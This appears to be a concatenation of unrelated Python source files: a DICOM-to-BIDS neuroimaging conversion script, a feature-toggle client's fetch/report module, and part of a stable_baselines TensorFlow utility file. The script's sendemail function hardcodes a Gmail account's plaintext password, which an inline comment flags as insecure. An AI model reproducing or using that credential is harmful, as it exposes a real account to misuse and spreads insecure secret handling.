    # Opt in to pybids' ".ext" (leading-dot) extension entity behavior.
    bids.config.set_option('extension_initial_dot', True)
    layout = bids.BIDSLayout(bidspath, derivatives=False, absolute_paths=True)
    return layout
# END make_bidsobject
def make_bidsname(entry,filepath,pid,ses,data,layout):
    """Match scanner DICOM series under `filepath` to BIDS filenames.

    Returns a 2-row list: acq_list[0] = ['dicomdir', <dicom paths...>],
    acq_list[1] = ['bidsfile', <bids names...>], aligned by index.
    """
    # loop through all possible scanner images to convert (e.g. anat, func, dwi, ...)
    imgtype = ['anat', 'func', 'dwi', 'fmap']
    acq_list = [['dicomdir'],['bidsfile']]
    for t in imgtype:
        # all images of type t
        if t not in data['Acquisition'][0]:
            continue
        modalimgs=data['Acquisition'][0][t]
        # all images of imgtype "t" (e.g. loop through all func images)
        for img in modalimgs:
            name = img['name']
            scanner_regexp = img['scanner_regexp']
            input_regexp = filepath + '/' + scanner_regexp + '_????'
            directories = glob.glob(input_regexp)
            if 'nAcquisitions' in img:
                nruns = int(img['nAcquisitions'])
            else:
                nruns = 1
            # error checking here
            dcm_errorcheck(directories,img,t,nruns) # check for errors in dicom set based on study template
            # return misstext, dupltext, incompltext for report...
            # Fix any issues...
            if len(directories) > nruns:
                directories.sort(key=os.path.getctime)
                directories = directories[-nruns:] # if too many runs are logged, use the most recently collected set
                # raise Exception("Number of matching aquisitions exceeds expected scans")
            elif len(directories) < nruns:
                if not entry.suppresswarnings:
                    print("**** \n\nNumber of matching aquisitions is less than expected scans:\n" + input_regexp + "\n Expected: "+ str(nruns) + " ... Found: " + str(len(directories)) + "\n\n***")
                    warnings.warn("**** \n\nNumber of matching aquisitions is less than expected scans\n\n***")
            directories = sorted(directories, key = last_4chars)
            # get match dicom name to bids name
            r=1
            for inputdir in directories:
                # Define the pattern to build out bids file structure
                pattern = data['Acquisition'][0]['Study'][0]['bids_pattern']
                # pattern = "sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
                # Populate values for pattern
                ent = img.copy() # pull pattern values directly from json file... (e.g. task, aquisition, suffix)
                ent['subject'] = pid
                if ses != "none":
                    ent['session'] = ses
                else:
                    # NOTE(review): empty list suppresses the optional [ses-...] entity in build_path — confirm.
                    ent['session'] = []
                ent['type'] = t
                if "run" in img:
                    if img["run"] == "n":
                        # Auto-number runs 01, 02, ... when the template requests it.
                        ent['run'] = str(r).zfill(2)
                        r = r + 1
                bidsfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
                dicomdir = inputdir
                acq_list[0].append(dicomdir) # all the dicom file paths
                acq_list[1].append(bidsfile) # all the bids filenames
    return acq_list
# END make_bidsname
# END make_bidsname
def nifti_convert(entry,acq_list,data):
    """Convert matched DICOM series to nifti via dcm2niix jobs submitted to slurm.

    Skips series whose BIDS output already exists; logs every dicom→bids pairing
    to <bids>/tmp/dcm2bids.key.  Accumulates warnings on nifti_convert.warnings.
    Actual conversion only runs when entry.runconvert is set.
    """
    warningstxt=""
    if not hasattr(nifti_convert,"warnings"):
        nifti_convert.warnings = "Warnings: "
    # check to make sure dicom list and bids list is the same length
    if len(acq_list[0]) != len(acq_list[1]):
        raise Exception("Issue with matching DICOM and BIDS format: Contact support team")
    studyname = data['Acquisition'][0]['Study'][0]['name']
    bidspath = data['Acquisition'][0]['Study'][0]['bids']
    r=1
    jobs=[];
    # Index 0 of each row is a header ('dicomdir'/'bidsfile'), so start at 1.
    for i in range(1,len(acq_list[0])):
        dicomdir = acq_list[0][i]
        bidsfile = acq_list[1][i].replace(".nii.gz","")
        bidsname=bidsfile.split("/")[-1]
        # print(dicomdir + " to " + bidsfile)
        # check if output file already exists
        if os.path.exists(bidspath + '/' + bidsfile + ".nii.gz"):
            print("Warning: " + bidsfile + ".nii.gz" + " already exists")
            warningstxt=warningstxt + "\n" + bidsfile + ".nii.gz" + " already exists"
            continue
        # print list of aqusition + bids names
        s="/"
        dicomname=dicomdir.split("/")
        dicomname=s.join(dicomname[-3:])
        f = open(bidspath+"/tmp/dcm2bids.key", "a")
        f.write(dicomname + "\t" + bidsname +"\n")
        f.close()
        #check if nifti conversion should run
        if not entry.runconvert:
            continue
        # run dcm2niix on cluster...
        # call worker...
        # run dicom converter - pass output to bids directory
        # NOTE(review): `i` in these comprehensions shadows the loop index — works
        # because the loop value is re-read next iteration, but worth renaming.
        subiden = [i for i in bidsname.split("_") if "sub" in i]
        sesiden = [i for i in bidsname.split("_") if "ses" in i]
        pid = subiden[0].split("-")[1]
        if sesiden:
            ses = sesiden[0].split("-")[1]
        else:
            ses=""
        imgdir=bidspath + "/tmp/data/bimages/" + pid + "/" + ses + "/Nifti"
        os.makedirs(imgdir, exist_ok=True)
        # prd_name=Path(dicomdir).stem[:-5]
        dicomname=dicomdir.split("/")
        prd_name=dicomname[-1]
        niftiimg = imgdir + '/' + prd_name
        print('Running:' + bidsfile + '.nii.gz')
        # add session paths
        # Copy the dcm2niix job-script template and fill in placeholders with sed.
        cmdfile = imgdir + '/run_dcm2niix_' + str(r).zfill(2)
        cmd='cp ' + entry.templates + 'run_dcm2niix.sh ' + cmdfile
        subprocess.run(cmd.split())
        cmd='chmod u+x ' + cmdfile
        subprocess.run(cmd.split())
        sed1=('s^DICOM_PLACEHOLDER^' + dicomdir + '^')
        sed2=('s^BIDSFILE_PLACEHOLDER^' + bidspath + '/' + bidsfile + '^')
        sed3=('s^NIFTI_PLACEHOLDER^' + niftiimg + '^')
        subprocess.run(['sed','-i',sed1,cmdfile])
        subprocess.run(['sed','-i',sed2,cmdfile])
        subprocess.run(['sed','-i',sed3,cmdfile])
        # run script
        slurm_outfile=imgdir+"/dcm2niix.o%j"
        slurm_errfile=imgdir+"/dcm2niix.e%j"
        sbatchflags = "-q preemptable -p blanca-ccn -A blanca-ics-" + studyname + " -c 2 --job-name dcm2niix --wait --time=04:00:00 --mem=16G -o " + slurm_outfile + " -e " + slurm_errfile
        cmd = 'sbatch ' + sbatchflags + ' ' + cmdfile
        name = "dcm2niix-" + str(r).zfill(2)
        # Each sbatch --wait submission gets its own process so jobs run in parallel.
        p = multiprocessing.Process(target=worker, args=(name,cmd))
        jobs.append(p)
        p.start()
        r = r+1
        print(p)
    for job in jobs:
        job.join() #wait for all distcorrepi commands to finish
    nifti_convert.warnings = nifti_convert.warnings + warningstxt
    # add intended for section in fieldmaps
    if entry.runconvert:
        intendedfor(acq_list,bidspath)
# END nifti_convert
def intendedfor(acq_list, bidspath, wait_secs=120):
    """Add an "IntendedFor" entry to fieldmap JSON sidecar files.

    Every fieldmap in the converted-file list is marked as intended for all
    functional and diffusion images from the same list, using BIDS-relative
    paths (last two path components).

    :param acq_list: indexable; acq_list[1] is the list of converted file paths
    :param bidspath: root of the BIDS dataset the sidecar files live under
    :param wait_secs: seconds to wait for converted files to appear before
        editing sidecars (default 120, the original behaviour)
    """
    funcfiles = [p for p in acq_list[1] if "func/" in p]
    dwifiles = [p for p in acq_list[1] if "dwi/" in p]
    fmapfiles = [p for p in acq_list[1] if "fmap/" in p]
    # fieldmaps apply to every functional and diffusion image;
    # trim each path to its last two components (BIDS-relative form)
    intended = ["/".join(p.split('/')[-2:]) for p in funcfiles + dwifiles]
    if fmapfiles:  # if convert list includes fmaps
        import time
        # wait for the converted files to show up in their new location
        # (was commented as "30 seconds" but always slept 120 — now explicit)
        time.sleep(wait_secs)
        for fmap in fmapfiles:
            sidecar = fmap.replace(".nii.gz", ".json")
            with open(bidspath + '/' + sidecar) as f:
                data = json.load(f)
            data["IntendedFor"] = intended
            # keep IntendedFor as the last key in the sidecar
            ordered = collections.OrderedDict(data)
            ordered.move_to_end('IntendedFor', last=True)
            with open(bidspath + '/' + sidecar, 'w') as outfile:
                json.dump(dict(ordered), outfile, indent=2)
# END intendedfor
def dcm_errorcheck(directories, img, modality, nruns):
    """Check dicom run directories for missing, duplicate and incomplete runs.

    Findings accumulate across calls on function attributes
    (dcm_errorcheck.misstext / .dupltext / .incomptext), which are created
    lazily on first use. NOTE: when duplicates are found, `directories` is
    sorted in place by creation time.
    """
    missing, duplicates, incomplete = [], [], []
    label = modality + "-" + img['name']
    # lazily create the accumulating report headers on first call
    for attr, header in (("misstext", "Missing scans:"),
                         ("dupltext", "Duplicate scans:"),
                         ("incomptext", "Incomplete scans:")):
        if not hasattr(dcm_errorcheck, attr):
            setattr(dcm_errorcheck, attr, header)
    # does the number of directories match the expected number of runs?
    if len(directories) > nruns:
        # too many: keep only the newest nruns and flag a duplicate
        directories.sort(key=os.path.getctime)
        directories = directories[-nruns:]
        duplicates.append(label)
    elif 0 < len(directories) < nruns:
        for run in range(len(directories), nruns):
            missing.append(label + "_run-" + str(run + 1).zfill(2))
    elif not directories:
        missing.append(label)
    run_no = 1
    for inputdir in directories:
        # if an expected scan length is defined, verify the dcm count
        if 'length' in img:
            if len(glob.glob(inputdir + "/*.dcm")) < img['length']:
                incomplete.append(label + "_run-" + str(run_no).zfill(2))
        run_no += 1
    nl = "\n    "
    if missing:
        dcm_errorcheck.misstext = dcm_errorcheck.misstext + nl + nl.join(missing)
    if duplicates:
        dcm_errorcheck.dupltext = dcm_errorcheck.dupltext + nl + nl.join(duplicates)
    if incomplete:
        dcm_errorcheck.incomptext = dcm_errorcheck.incomptext + nl + nl.join(incomplete)
# END dcm_errorcheck
def make_textreport(study, scannerid, pid, ses, scandate):
    """Assemble the per-session report text and clear the accumulated warnings.

    Consumes (and then deletes) the warning strings accumulated on the
    nifti_convert and dcm_errorcheck function attributes; run once per scan
    session.

    :param study: study name ("rray" gets a compact subject label)
    :param scannerid: scanner identifier
    :param pid: participant id
    :param ses: session id (or "none")
    :param scandate: scan date string
    :return: the formatted report text
    """
    if study == "rray":
        if ses != "none":
            subjecttext = "Subject: r" + str(pid) + "s" + str(ses)
        else:
            subjecttext = "Subject: r" + str(pid)
    else:
        subjecttext = "Subject: " + str(pid) + " Session: " + str(ses)
    reporttxt = ("Study: " + study + "\n"
                 "Scannerid: " + scannerid + "\n" + subjecttext + "\n"
                 "Scan Date: " + scandate + "\n")
    # BUGFIX: previously only nifti_convert.warnings was guarded with hasattr;
    # reading dcm_errorcheck.* below raised AttributeError when dcm_errorcheck
    # was never called. Initialise every missing accumulator.
    if not hasattr(nifti_convert, "warnings"):
        nifti_convert.warnings = "Warnings:"
    if not hasattr(dcm_errorcheck, "misstext"):
        dcm_errorcheck.misstext = "Missing scans:"
    if not hasattr(dcm_errorcheck, "incomptext"):
        dcm_errorcheck.incomptext = "Incomplete scans:"
    if not hasattr(dcm_errorcheck, "dupltext"):
        dcm_errorcheck.dupltext = "Duplicate scans:"
    # a single-line accumulator means no entries were recorded: append " none"
    if len(nifti_convert.warnings.split("\n")) < 2:
        nifti_convert.warnings = nifti_convert.warnings + " none"
    if len(dcm_errorcheck.misstext.split("\n")) < 2:
        dcm_errorcheck.misstext = dcm_errorcheck.misstext + " none"
    if len(dcm_errorcheck.incomptext.split("\n")) < 2:
        dcm_errorcheck.incomptext = dcm_errorcheck.incomptext + " none"
    if len(dcm_errorcheck.dupltext.split("\n")) < 2:
        dcm_errorcheck.dupltext = dcm_errorcheck.dupltext + " none"
    reporttxt = (reporttxt + nifti_convert.warnings + "\n" + dcm_errorcheck.misstext
                 + "\n" + dcm_errorcheck.incomptext + "\n" + dcm_errorcheck.dupltext)
    # reset the accumulators so the next session starts clean
    delattr(nifti_convert, "warnings")
    delattr(dcm_errorcheck, "misstext")
    delattr(dcm_errorcheck, "incomptext")
    delattr(dcm_errorcheck, "dupltext")
    return reporttxt
# set up email notification
def sendemail(emailtxt, data, entry):
    """Email the scanner report to every study contact via gmail SSL SMTP.

    :param emailtxt: report body text
    :param data: study config dict; uses data['Acquisition'][0]['Study'][0]['name']
        and data['Study Contact'] (list of dicts with an 'email' key)
    :param entry: parsed arguments; entry.trange is the date range in days
    """
    port = 465  # For SSL
    smtp_server = "smtp.gmail.com"
    sender_email = "noreply.incdata@gmail.com"  # Enter your address
    # SECURITY: credentials must not live in source control; load this from an
    # environment variable or a config file instead. Kept to preserve behaviour.
    password = "Buffs2021!"
    # get date info for the subject line
    import datetime as dt
    today = dt.datetime.now().date()
    start_date = today - dt.timedelta(days=int(entry.trange))
    # # ... email text ....
    studyname = data['Acquisition'][0]['Study'][0]['name']
    message = "Subject: " + "[inc_scanner_report] " + studyname + ": date range " + str(start_date) + " to " + str(today) + "\n\n" + emailtxt
    # one SSL connection reused for all recipients (previously the code
    # reconnected and re-authenticated once per contact)
    context = ssl.create_default_context()
    with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:
        server.login(sender_email, password)
        for person in data['Study Contact']:
            server.sendmail(sender_email, person['email'], message)
def main(argv):
    """Entry point: parse arguments, build the heuristic, check for new scans.

    :param argv: command-line arguments (excluding the program name)
    """
    # get user entry
    entry = parse_arguments(argv)
    os.makedirs(entry.wd, exist_ok=True)
    # NOTE: removed the unused local "logdir = entry.wd + '/logs'" assignment
    # get participant bids path:
    heuristic(entry)
    # check for new scans
    new_scans(entry)
# END main
if __name__ == "__main__":
    # Run the pipeline only when executed as a script (not on import),
    # forwarding the CLI arguments minus the program name.
    main(sys.argv[1:])
|
io.py | import datetime
import json
import logging
import threading
import time
import os
import requests
from .util import FrozenDict
log = logging.getLogger(__name__)
class PeriodicalOperation:
    """Base class for operations re-run at most once per `interval` seconds.

    Subclasses implement run(), which must release self.lock in a finally
    block and refresh self.cache / self.last. The class object itself is used
    as the "never ran" sentinel value for the cache.
    """

    def __init__(self, interval, clock=time.time):
        """
        :param interval: minimum seconds between runs
        :param clock: time source, injectable for testing (defaults to time.time)
        """
        self.clock = clock
        self.interval = interval
        self.lock = threading.Lock()
        self.last = self.clock()
        # sentinel meaning "run() has never populated the cache"
        self.cache = PeriodicalOperation
        # equivalent to the module logger's child for this subclass
        self.log = logging.getLogger(__name__).getChild(self.__class__.__name__)

    def __call__(self):
        # BUGFIX: sentinel comparison now uses identity (`is`), matching the
        # check in UrlFetcher.run; `==` invoked the cached value's __eq__.
        if self.cache is PeriodicalOperation:
            self.log.debug('first run')
            # block so the first caller gets a populated cache; run() releases
            self.lock.acquire(True)
            self.run()
        now = self.clock()
        if now >= self.last + self.interval:
            # non-blocking: only one refresher at a time, others use the cache
            if self.lock.acquire(False):
                self.log.info('got lock')
                threading.Thread(target=self.run).start()
        return self.cache
class UrlFetcher(PeriodicalOperation):
    """Periodically fetch a JSON document over HTTP, honouring ETags."""

    def __init__(self, url, interval, headers=None, clock=time.time):
        super().__init__(interval, clock)
        self.url = url
        self._headers = headers or {}
        self.etag = ''  # last ETag seen; echoed back as If-None-Match

    def run(self):
        # noinspection PyBroadException
        try:
            self._headers.update({'If-None-Match': self.etag})
            self.log.debug("Headers: %r", self._headers)
            self.log.debug("ETag: %r", self.etag)
            res = requests.get(url=self.url, headers=self._headers, timeout=3.0)
            self._headers.pop('If-None-Match', None)
            if res.status_code == 304:
                self.log.debug("use cached value")
                return self.cache
            elif res.ok:
                self.log.debug("unpack new value")
                # BUGFIX: a server that omits the ETag header used to raise
                # KeyError here, discarding the freshly fetched body and
                # serving the stale cache forever; fall back to '' instead.
                self.etag = res.headers.get('ETag', '')
                self.cache = res.json(object_hook=FrozenDict)
                return self.cache
            else:
                res.raise_for_status()
        # narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are not swallowed by the best-effort fetch
        except Exception:
            if log.isEnabledFor(logging.DEBUG):
                log.debug("Exception fetching %r", self.url, exc_info=True)
            else:
                log.info("Exception fetching %r", self.url)
            if self.cache is PeriodicalOperation:
                self.cache = {}
            return self.cache
        finally:
            self.last = self.clock()
            self.lock.release()
class Reporter(PeriodicalOperation):
    """Periodically POST a usage report of the client's feature toggles."""

    def __init__(self, client, url, interval, headers=None, clock=time.time):
        super().__init__(interval, clock)
        # reports have no meaningful cached value; None also disables the
        # parent's first-run blocking path in __call__
        self.cache = None
        self.client = client
        self.url = url
        self._headers = headers or {}

    @staticmethod
    def fmt_time(t):
        # NOTE(review): %F/%T are not portable strftime codes (e.g. Windows),
        # and the trailing 'Z' implies UTC while fromtimestamp() yields local
        # time — confirm against the receiving API's expectation.
        return datetime.datetime.fromtimestamp(t).strftime('%FT%TZ')

    def run(self):
        # noinspection PyBroadException
        try:
            now = self.clock()
            # bucket covers [last, now); advance `last` before the slow POST
            start, stop, self.last = self.last, now, now
            bucket = {
                'start': self.fmt_time(start),
                'stop': self.fmt_time(stop),
                'toggles': {
                    name: feature.report()
                    for name, feature in self.client.features.items()
                },
            }
            report = {
                "appName": self.client.app_name,
                "instanceId": self.client.instance_id,
                "bucket": bucket,
            }
            self.log.info('%r', report)
            res = requests.post(self.url, headers=self._headers, json=report)
            self.log.info('%r', res.status_code)
        except Exception:
            # best-effort: reporting must never break the caller, but the
            # former bare `except: pass` hid every failure — log it instead
            self.log.debug('report failed', exc_info=True)
        finally:
            self.lock.release()
class FileFetcher:
    """Return a file's JSON contents, re-reading only when its mtime advances.

    On any error the previously cached document is returned unchanged.
    """
    # overridable I/O hooks (class attributes, so instances can be redirected)
    open_f = open
    stat_f = os.stat

    def __init__(self, path):
        self.cache = {}   # last successfully parsed document
        self.path = path
        self.last = 0     # mtime at the last successful read

    def __call__(self):
        # noinspection PyBroadException
        try:
            st = self.stat_f(self.path)
            if st.st_mtime > self.last:
                with self.open_f(self.path) as fh:
                    self.cache = json.load(fh)
                self.last = st.st_mtime
        # narrowed from a bare `except:` — best-effort, keep serving the cache
        except Exception:
            if log.isEnabledFor(logging.DEBUG):
                log.debug("Failed to read %r", self.path, exc_info=True)
            else:
                # BUGFIX: the %r placeholder previously had no argument
                log.info("Failed to read %r", self.path)
        # moved out of `finally:` — returning from finally suppresses any
        # in-flight exception, which masked bugs
        return self.cache
|
tf_util.py | import copy
import os
import functools
import collections
import multiprocessing
import numpy as np
import tensorflow as tf
from tensorflow.python.client import device_lib
from stable_baselines import logger
def is_image(tensor):
    """
    Check whether a tensor is shaped like a valid image for tensorboard
    logging: rank 3 with a last dimension of 1 (GrayScale), 3 (RGB) or 4 (RGBD).

    :param tensor: (np.ndarray or tf.placeholder)
    :return: (bool)
    """
    shape = tensor.shape
    return len(shape) == 3 and shape[-1] in (1, 3, 4)
def switch(condition, then_expression, else_expression):
    """
    Switches between two operations depending on a scalar value (int or bool).
    Note that both `then_expression` and `else_expression`
    should be symbolic tensors of the *same shape*.

    :param condition: (TensorFlow Tensor) scalar tensor.
    :param then_expression: (TensorFlow Operation)
    :param else_expression: (TensorFlow Operation)
    :return: (TensorFlow Operation) the switch output
    """
    static_shape = copy.copy(then_expression.get_shape())
    result = tf.cond(tf.cast(condition, 'bool'),
                     lambda: then_expression,
                     lambda: else_expression)
    # tf.cond drops static shape information; restore it from the input
    result.set_shape(static_shape)
    return result
# ================================================================
# Extras
# ================================================================
def leaky_relu(tensor, leak=0.2):
    """
    Leaky ReLU, expressed branch-free as a blend of identity and |x|:
    0.5*(1+leak)*x + 0.5*(1-leak)*|x|.
    http://web.stanford.edu/~awni/papers/relu_hybrid_icml2013_final.pdf

    :param tensor: (float) the input value
    :param leak: (float) the leaking coefficient when the function is saturated
    :return: (float) Leaky ReLU output
    """
    return 0.5 * (1 + leak) * tensor + 0.5 * (1 - leak) * abs(tensor)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(tensor, delta=1.0):
    """
    Huber loss: quadratic for |x| < delta, linear beyond.
    Reference: https://en.wikipedia.org/wiki/Huber_loss

    :param tensor: (TensorFlow Tensor) the input value
    :param delta: (float) huber loss delta value
    :return: (TensorFlow Tensor) huber loss output
    """
    abs_error = tf.abs(tensor)
    quadratic = tf.square(tensor) * 0.5
    linear = delta * (abs_error - 0.5 * delta)
    return tf.where(abs_error < delta, quadratic, linear)
# ================================================================
# Global session
# ================================================================
def make_session(num_cpu=None, make_default=False, graph=None):
    """
    Returns a session that will use <num_cpu> CPU's only

    :param num_cpu: (int) number of CPUs to use for TensorFlow
    :param make_default: (bool) if this should return an InteractiveSession or a normal Session
    :param graph: (TensorFlow Graph) the graph of the session
    :return: (TensorFlow session)
    """
    if num_cpu is None:
        num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
    config = tf.ConfigProto(
        allow_soft_placement=True,
        inter_op_parallelism_threads=num_cpu,
        intra_op_parallelism_threads=num_cpu)
    # Prevent tensorflow from taking all the gpu memory
    config.gpu_options.allow_growth = True
    session_cls = tf.InteractiveSession if make_default else tf.Session
    return session_cls(config=config, graph=graph)
def single_threaded_session(make_default=False, graph=None):
    """
    Convenience wrapper: a session restricted to a single CPU thread.

    :param make_default: (bool) if this should return an InteractiveSession or a normal Session
    :param graph: (TensorFlow Graph) the graph of the session
    :return: (TensorFlow session)
    """
    return make_session(num_cpu=1, make_default=make_default, graph=graph)
def in_session(func):
    """
    Decorator that runs the wrapped function inside a fresh TensorFlow session.

    :param func: (function) the function to wrap
    :return: (function)
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        with tf.Session():
            func(*args, **kwargs)
    return wrapper
# Variables already initialised by initialize(); shared across calls so the
# same variables are not re-initialised.
ALREADY_INITIALIZED = set()
def initialize(sess=None):
    """
    Initialize all the uninitialized variables in the global scope.

    :param sess: (TensorFlow Session) defaults to the default session
    """
    if sess is None:
        sess = tf.get_default_session()
    # only touch variables not initialised by a previous call
    pending = set(tf.global_variables()).difference(ALREADY_INITIALIZED)
    sess.run(tf.variables_initializer(pending))
    ALREADY_INITIALIZED.update(pending)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
    """
    Return a TensorFlow initializer drawing gaussian samples that are
    normalized along `axis` to have norm `std`.

    :param std: (float) standard deviation
    :param axis: (int) the axis to normalize on
    :return: (function)
    """
    def _initializer(shape, dtype=None, partition_info=None):
        sample = np.random.randn(*shape).astype(np.float32)
        norm = np.sqrt(np.square(sample).sum(axis=axis, keepdims=True))
        return tf.constant(sample * (std / norm))
    return _initializer
def conv2d(input_tensor, num_filters, name, filter_size=(3, 3), stride=(1, 1),
           pad="SAME", dtype=tf.float32, collections=None, summary_tag=None):
    """
    Creates a 2d convolutional layer for TensorFlow

    :param input_tensor: (TensorFlow Tensor) The input tensor for the convolution
    :param num_filters: (int) The number of filters
    :param name: (str) The TensorFlow variable scope
    :param filter_size: (tuple) The filter size
    :param stride: (tuple) The stride of the convolution
    :param pad: (str) The padding type ('VALID' or 'SAME')
    :param dtype: (type) The data type for the Tensors
    :param collections: (list) List of graph collections keys to add the Variable to
    :param summary_tag: (str) image summary name, can be None for no image summary
    :return: (TensorFlow Tensor) 2d convolutional layer
    """
    with tf.variable_scope(name):
        strides = [1, stride[0], stride[1], 1]
        in_channels = int(input_tensor.get_shape()[3])
        kernel_shape = [filter_size[0], filter_size[1], in_channels, num_filters]
        # fan_in: "num input feature maps * filter height * filter width"
        # inputs to each hidden unit
        fan_in = intprod(kernel_shape[:3])
        # fan_out: each unit in the lower layer receives a gradient from
        # "num output feature maps * filter height * filter width" / pooling size
        fan_out = intprod(kernel_shape[:2]) * num_filters
        # uniform initialization bound sqrt(6 / (fan_in + fan_out))
        bound = np.sqrt(6. / (fan_in + fan_out))
        kernel = tf.get_variable("W", kernel_shape, dtype,
                                 tf.random_uniform_initializer(-bound, bound),
                                 collections=collections)
        bias = tf.get_variable("b", [1, 1, 1, num_filters],
                               initializer=tf.zeros_initializer(),
                               collections=collections)
        if summary_tag is not None:
            # visualize each filter channel as its own single-channel image
            flat_kernel = tf.reshape(kernel, [filter_size[0], filter_size[1], -1, 1])
            tf.summary.image(summary_tag,
                             tf.transpose(flat_kernel, [2, 0, 1, 3]),
                             max_outputs=10)
        return tf.nn.conv2d(input_tensor, kernel, strides, pad) + bias
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
    """
    Build a Theano-style callable from TensorFlow placeholders and expressions.

    The returned function takes values for the input placeholders
    (positionally) and evaluates `outputs` in a session; the return value
    mirrors the container type of `outputs` (list -> list, dict -> same dict
    type with the same keys, single tensor -> single value).

    Example:

    >>> x = tf.placeholder(tf.int32, (), name="x")
    >>> y = tf.placeholder(tf.int32, (), name="y")
    >>> z = 3 * x + 2 * y
    >>> lin = function([x, y], z, givens={y: 0})
    >>> with single_threaded_session():
    >>>     initialize()
    >>>     assert lin(2) == 6
    >>>     assert lin(2, 2) == 10

    :param inputs: (TensorFlow Tensor or Object with make_feed_dict) list of input arguments
    :param outputs: (TensorFlow Tensor) list of outputs or a single output to be returned from function. Returned
        value will also have the same shape.
    :param updates: ([tf.Operation] or tf.Operation)
        list of update functions or single update function that will be run whenever
        the function is called. The return is ignored.
    :param givens: (dict) the values known for the output
    """
    if isinstance(outputs, (dict, collections.OrderedDict)):
        inner = _Function(inputs, outputs.values(), updates, givens=givens)
        return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), inner(*args, **kwargs)))
    if isinstance(outputs, list):
        return _Function(inputs, outputs, updates, givens=givens)
    inner = _Function(inputs, [outputs], updates, givens=givens)
    return lambda *args, **kwargs: inner(*args, **kwargs)[0]
class _Function(object):
    # Callable that runs a fixed set of outputs plus an update group in one
    # sess.run; built by function() above.
    def __init__(self, inputs, outputs, updates, givens):
        """
        Theano like function

        :param inputs: (TensorFlow Tensor or Object with make_feed_dict) list of input arguments
        :param outputs: (TensorFlow Tensor) list of outputs or a single output to be returned from function. Returned
            value will also have the same shape.
        :param updates: ([tf.Operation] or tf.Operation)
        list of update functions or single update function that will be run whenever
        the function is called. The return is ignored.
        :param givens: (dict) the values known for the output
        """
        for inpt in inputs:
            # accept feed-dict-aware objects, or tensors with no producing
            # inputs (i.e. placeholders and constants)
            if not hasattr(inpt, 'make_feed_dict') and not (isinstance(inpt, tf.Tensor)and len(inpt.op.inputs) == 0):
                assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
        self.inputs = inputs
        updates = updates or []
        # group the update ops so they execute in the same run as the outputs
        self.update_group = tf.group(*updates)
        self.outputs_update = list(outputs) + [self.update_group]
        self.givens = {} if givens is None else givens

    @classmethod
    def _feed_input(cls, feed_dict, inpt, value):
        # route a value either through the object's own feed logic or
        # directly into the feed dict keyed by the placeholder
        if hasattr(inpt, 'make_feed_dict'):
            feed_dict.update(inpt.make_feed_dict(value))
        else:
            feed_dict[inpt] = value

    def __call__(self, *args, sess=None, **kwargs):
        # Extra **kwargs are forwarded to sess.run (e.g. options/run_metadata).
        assert len(args) <= len(self.inputs), "Too many arguments provided"
        if sess is None:
            sess = tf.get_default_session()
        feed_dict = {}
        # Update the args
        for inpt, value in zip(self.inputs, args):
            self._feed_input(feed_dict, inpt, value)
        # Update feed dict with givens (positional args take precedence).
        for inpt in self.givens:
            feed_dict[inpt] = feed_dict.get(inpt, self.givens[inpt])
        # drop the trailing update-group result; callers only see the outputs
        results = sess.run(self.outputs_update, feed_dict=feed_dict, **kwargs)[:-1]
        return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(tensor):
    """
    Return the static TensorFlow Tensor shape as a list of ints.

    :param tensor: (TensorFlow Tensor) the input tensor
    :return: ([int]) the shape
    """
    shape = tensor.get_shape().as_list()
    assert all(isinstance(dim, int) for dim in shape), \
        "shape function assumes that shape is fully known"
    return shape
def numel(tensor):
    """
    Total number of elements in a tensor with fully-known static shape.

    :param tensor: (TensorFlow Tensor) the input tensor
    :return: (int) the number of elements
    """
    return intprod(var_shape(tensor))
def intprod(tensor):
    """
    Product of all the elements in a list, truncated to int.

    :param tensor: ([Number]) the list of elements
    :return: (int) the product truncated
    """
    return int(np.prod(tensor))
def flatgrad(loss, var_list, clip_norm=None):
    """
    Compute the gradients of `loss` w.r.t. `var_list` and concatenate them
    into one flat vector; variables with no gradient contribute zeros.

    :param loss: (float) the loss value
    :param var_list: ([TensorFlow Tensor]) the variables
    :param clip_norm: (float) clip the gradients (disabled if None)
    :return: ([TensorFlow Tensor]) flattened gradient
    """
    grads = tf.gradients(loss, var_list)
    if clip_norm is not None:
        grads = [tf.clip_by_norm(g, clip_norm=clip_norm) for g in grads]
    pieces = []
    for var, grad in zip(var_list, grads):
        filled = grad if grad is not None else tf.zeros_like(var)
        pieces.append(tf.reshape(filled, [numel(var)]))
    return tf.concat(axis=0, values=pieces)
class SetFromFlat(object):
    def __init__(self, var_list, dtype=tf.float32, sess=None):
        """
        Build an operation that assigns a flat parameter vector back into
        the given list of variables.

        :param var_list: ([TensorFlow Tensor]) the variables
        :param dtype: (type) the type for the placeholder
        :param sess: (TensorFlow Session)
        """
        shapes = [var_shape(v) for v in var_list]
        total_size = np.sum([intprod(s) for s in shapes])
        self.theta = theta = tf.placeholder(dtype, [total_size])
        assigns = []
        offset = 0
        # carve consecutive slices of theta and reshape each into its variable
        for shape, var in zip(shapes, var_list):
            size = intprod(shape)
            chunk = tf.reshape(theta[offset:offset + size], shape)
            assigns.append(tf.assign(var, chunk))
            offset += size
        self.operation = tf.group(*assigns)
        self.sess = sess

    def __call__(self, theta):
        session = self.sess if self.sess is not None else tf.get_default_session()
        return session.run(self.operation, feed_dict={self.theta: theta})
class GetFlat(object):
    def __init__(self, var_list, sess=None):
        """
        Build an operation that fetches all variables concatenated into one
        flat vector.

        :param var_list: ([TensorFlow Tensor]) the variables
        :param sess: (TensorFlow Session)
        """
        flats = [tf.reshape(v, [numel(v)]) for v in var_list]
        self.operation = tf.concat(axis=0, values=flats)
        self.sess = sess

    def __call__(self):
        session = self.sess if self.sess is not None else tf.get_default_session()
        return session.run(self.operation)
def flattenallbut0(tensor):
    """
    Flatten every dimension except the first (batch) dimension.

